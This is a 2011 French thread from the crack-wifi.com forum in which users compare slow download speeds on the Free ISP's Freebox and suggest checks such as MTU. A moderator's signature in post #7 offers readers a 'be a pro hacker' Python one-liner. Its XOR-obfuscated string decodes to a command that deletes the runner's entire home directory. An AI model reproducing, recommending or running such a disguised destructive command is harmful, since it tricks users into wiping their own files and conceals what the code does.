Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 06-11-2011 17:04:57

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Free a t-il limiter sa bande passante?

Coucou wink


Je suis chez free et depuis un moment lors d'un direct download ou juste en écoutant la radio en direct, ça rame pas mal je trouve.

Pour exemple j'ai eu ma freeboxV6 il y a a peu près 6 a 7 mois en filaire je tournai a 1100KB/s en wifi a 400 ou 500 depuis 1 mois c'est catastrophique, entre 150 et 200KB/s en filaire et 100 en wifi.J'ouvre une page youtube avec un téléchargement en cours, la vidéo youtube ne cesse de sauter et en jeux FPS en ligne ça rame aussi j'ai des lags monumental.Pour vous dire j'ai redémarrer ma box l'autre jour a 4hr du mat histoire de choper le max de puissance possible et ça n'a pas changé.

Si vous avez free vous aussi j'aimerais savoir si vous avez pu constater la meme chose wink

Ps: je suis bien en dégroupage total avec un débit estimé a 13 méga

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 06-11-2011 20:45:48

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Free a t-il limiter sa bande passante?

Pareil! j'ai constaté la même chose chez un ami, moi j'utilise le plus souvent un hotspot, c'est pire. Il y a eu une discussion dans le genre: Free wifi bridé ???

Hors Ligne

#3 06-11-2011 20:50:21

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Free a t-il limiter sa bande passante?

Merci Fuji mais ça c'est sur un hotspot il es donc normal d'avoir un faible débit mais pour une connexion privé je trouve ça choquant d'autant plus que le changement a été radical.

Hors Ligne

#4 06-11-2011 21:01:57

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Free a t-il limiter sa bande passante?

Non no, je te parle bien d'une connexion privée dans un premier temps, où une vidéo youtube a du mal à monter, puisque ta question était " avez-vous pu constater la même chose ". J'ai juste fais la liaison avec le hotspot, parce que ça m’énerve les hotspots big_smile

Hors Ligne

#5 06-11-2011 21:13:38

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Free a t-il limiter sa bande passante?

Autant pour moi smile

Je reviens donc avec le résultat des test effectuer sur speedtest:

-ping: 40ms, Débit descendant: 13,79/montant: 0,85mbps, jilter: 4ms

Ç'est pas mal comme ça et ça correspond a peu près a l'estimation de débit lors de l'ouverture de la ligne donc je pense qu'ils ont belle et bien changé quelque chose depuis le mois dernier.

Hors Ligne

#6 06-11-2011 21:30:33

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Free a t-il limiter sa bande passante?

Vérifies comme même la MTU.

Hors Ligne

#7 06-11-2011 21:37:00

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : Free a t-il limiter sa bande passante?

si par "depuis un moment" tu entends quelques heures, alors non, tu n'es pas le seul.

@bluetouff a signalé que les downloads de plus de 600Mio sont reset chez free hier soir (et il a dit que ca l'embêtait bien pour dl sa backtrack )


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#8 06-11-2011 22:21:22

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Free a t-il limiter sa bande passante?

@Fuji

Tout va bien de ce coté la smile

Ps: la je télécharge un truc en filaire ça tourne a 54KB/s je suis sur d'un neufwifi ça serait plus rapide lol

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
11 448 05-09-2016 15:07:25 par MiscL
Mot de passe réseau local Free par superkillerspa
1 900 27-09-2014 18:13:38 par Furyo
1 1722 17-08-2014 19:08:12 par Furyo
1 1342 10-03-2014 23:03:49 par kcdtv
2 1620 10-03-2014 22:44:13 par kcdtv

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.037 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]